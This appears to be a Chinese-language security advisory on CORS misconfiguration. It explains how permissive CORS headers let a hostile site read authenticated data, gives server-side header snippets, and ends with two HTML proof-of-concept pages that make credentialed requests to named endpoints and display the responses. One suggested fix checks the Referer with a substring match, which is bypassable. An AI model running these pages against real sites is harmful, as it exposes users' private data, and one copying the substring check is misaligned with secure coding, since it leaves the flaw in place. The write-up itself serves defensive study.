CORS跨域资源读取漏洞

中危

CORS是一种允许浏览器向跨源服务器发送请求的机制,用以实现跨域数据交换。但是,如果服务器没有正确配置CORS策略,攻击者就可以利用此漏洞来绕过浏览器的同源策略限制,从跨源服务器获取敏感信息。

CORS策略应该只允许来自合法域的请求,并且只允许合法的HTTP方法和header。如果CORS策略配置不当或过于宽松,攻击者可以利用这点来绕过限制,由跨源服务器发起CORS请求来绕过同源策略限制,获取跨源数据。

攻击者可以利用CORS错误配置漏洞，从恶意网站跨域读取受害网站的敏感信息。

location /{    add_header 'Access-Control-Allow-Origin' ip地址;    add_header 'Access-Control-Allow-Credentials' 'true';    add_header 'Access-Control-Allow-Headers' 'Authorization,Content-Type,Accept,Origin,User-Agent,DNT,Cache-Control,X-Mx-ReqToken,X-Requested-With';    add_header 'Access-Control-Allow-Methods' 'GET,POST';}

// 跨域请求前设置正确的CORS头response.setHeader("Access-Control-Allow-Origin", "http://example.com"); response.setHeader("Access-Control-Allow-Methods", "GET, POST, OPTIONS");response.setHeader("Access-Control-Allow-Headers", "X-Requested-With,Content-Type");

// 服务端校验referer头并设置允许的originif (request.getHeader("referer") != null &&     request.getHeader("referer").contains("http://example.com")) {  response.setHeader("Access-Control-Allow-Origin", "http://example.com");  } else {   response.sendError(403);  // Forbidden  }

// 前端通过AJAX发起跨域请求var xhr = new XMLHttpRequest();xhr.open('GET', 'http://example.org/cors-endpoint');xhr.setRequestHeader('Origin', 'http://example.com');xhr.send();

// 服务端检验origin头并做出响应if (request.getHeader("Origin") != null &&     request.getHeader("Origin").equals("http://example.com")) {  response.setHeader("Access-Control-Allow-Origin", "http://example.com");  } else {   response.sendError(403);  } 

// 使用CORS middleware对所有请求设置默认CORS头app.use((req, res, next) => {  res.setHeader('Access-Control-Allow-Origin', 'http://example.com');  res.setHeader(    'Access-Control-Allow-Methods',     'GET, POST, OPTIONS, PUT, PATCH, DELETE'  );  res.setHeader(    'Access-Control-Allow-Headers',     'X-Requested-With,content-type'  );  next();});

<!DOCTYPE html><html>  <body>    <center>      <h2>CORS POC Exploit</h2>      <h3>Extract SID</h3>
      <div id="demo">        <button type="button" onclick="cors()">Exploit</button>      </div>
      <script>        function cors() {          var xmlhttp = new XMLHttpRequest();          xmlhttp.onreadystatechange = function() {            if (this.readyState == 4 && this.status == 200) {              document.getElementById("demo").innerHTML = alert(this.responseText);            }          };          xmlhttp.open("GET", "https://www.baidu.com/usma/api/v1/system/list?systemName=&pageSize=100&page=1", true);          xmlhttp.withCredentials = true;          xmlhttp.send();        }</script>
  </body></html>

<!DOCTYPE html><html>  <head>    <script>      function cors() {                var xmlhttp = new XMLHttpRequest();                var params = '{"appAccount":"","positionCode":"","cn":"","companyCode":"","state":"","pageNumber":1,"pageSize":15,"pageCode":"qx01"}';                xmlhttp.onreadystatechange = function() {                        if (this.readyState == 4 && this.status == 200){                                document.getElementById("demo").innerHTML = alert(this.responseText);                        }                };                xmlhttp.open("POST", "http://www.pxc.local/master/userAuth/list", true);                xmlhttp.setRequestHeader('Content-type', 'application/json;charset=UTF-8');                xmlhttp.setRequestHeader('X-Requested-With', 'XMLHttpRequest');                xmlhttp.setRequestHeader('CSRF', 'Token');                xmlhttp.setRequestHeader('Accept', '');                xmlhttp.setRequestHeader('X-AUTH-TOKEN', 'X-AUTH-TOKEN');                xmlhttp.setRequestHeader('X-AUTH-UID', 'X-AUTH-UID');                xmlhttp.withCredentials = true;                xmlhttp.send(params);        }</script>  </head>  <body>    <center>      <h2>CORS POC</h2>      <h3>Extract Information</h3>      <div id="demo">        <button type="button" onclick="cors()">Exploit</button>      </div>  </body></html>